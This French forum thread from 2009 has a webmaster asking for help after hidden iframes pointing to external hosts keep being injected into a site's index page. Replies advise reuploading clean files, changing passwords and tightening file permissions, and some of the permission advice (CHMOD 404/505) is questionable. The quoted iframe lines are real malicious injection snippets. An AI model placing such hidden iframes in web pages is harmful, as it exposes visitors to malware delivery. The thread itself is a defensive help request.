mon site est hacké ?

voyagesnet · 20 Juin 2009

bonjour
j'ai un souci
vraiment je ne sais pas d'où il vient le problème
chaque 2 jours
je trouve quelques balises que sont effacés et je trouve un autre code qui s'ajoute automatiquement juste en avant de <body>

voila le code
parfois:
<iframe src="http://turbonamestore.cn:8080/index.php" width=160 height=163 style="visibility: hidden"></iframe>
et parfois:
parfois:
<iframe src="http://javagoogle/index.php" width=160 height=163 style="visibility: hidden"></iframe>
je ne sais pas c'est quoi exactement ?sachant que la page index de site seulement que se change

y'a t 'il de réponse SVp ?
supposant que mon site est hacké quels sont les mesures à prendre pour le securiser complétement
sachant que je fais aujourd'hui le changement de mot de passe de ftp

est ce que ce problème peut être cause d'un mauvais script utiliser sachant qu'il a commencer dès mon installation d'un script de analytics (php-stats0-1.9.2
merci
cordialement

darkjukka · 20 Juin 2009

Je pense que cette petite liste ne sera pas superflue :

Ré-uploader tout ton site en étant sûr que les fichiers sont sains
Changer ton mot de passe FTP
Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir

voyagesnet · 20 Juin 2009

darkjukka a dit:
Je pense que cette petite liste ne sera pas superflue :

Ré-uploader tout ton site en étant sûr que les fichiers sont sains

Changer ton mot de passe FTP

Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple

Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues

Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir

bonjour
le chmod est par defaut chmod 777 sur le fichier
alors qu'est ce que je dois changer comme droit sur les fichiers?
et j'utilise aussi le fichier:
error401.html
error400.html
error403.html
error500.html

darkjukka · 20 Juin 2009

Oula 777 c'est le pire ! Tout le monde peut le modifier

Passe le CHMOD à 404 ca ne sera que plus sécurisé.

Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^

voyagesnet · 20 Juin 2009

darkjukka a dit:
Oula 777 c'est le pire ! Tout le monde peut le modifier
Passe le CHMOD à 404 ca ne sera que plus sécurisé.

Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^

mais si je passe le CHMOD en 404 alors comme ca je n'aurais pas l'autirisation ni de modifier ni d'executer les fichiers et les dossier
c'est mieux de faire 704 n'est ce pas et est ce que je dois faire ca sur tous les fichiers et les dossiers c a d sur le dossier www?

merci

cordialement

darkjukka · 20 Juin 2009

Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau

voyagesnet · 20 Juin 2009

darkjukka a dit:
Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau

et pusique je travail en plein temp sur le site
alors
à chaque remonte de fichier je dois changer l'accés?

bon pour le www je fais CHMOD 705
et pour les autres fichiers et dossiers je fais 755

que pensez vous comme ça?
y'a t 'il d'inconvénient?

merci

darkjukka · 20 Juin 2009

Ya pas d'inconvénients mais par contre j'ai pas compris la première partie de ton post, tu peux être plus clair ?

j-mi · 20 Juin 2009

Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777

je trouve que c'est mieux de travailler en htacces

voyagesnet · 21 Juin 2009

mi-mi a dit:
Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777

je trouve que c'est mieux de travailler en htacces

bonjour
même avec le htaccess je va utiliser le CHMOD non?

sinon
je crois que je dois écrire dans chaque fichier :

-> AllowOverride All pour donner l'accées à tous
sinon comment faire pour definir l'accés au propriétaire de site , l'internaute et le groupe de travail

est ce qu'il est utile d'utiliser le .htpassword

merci
bye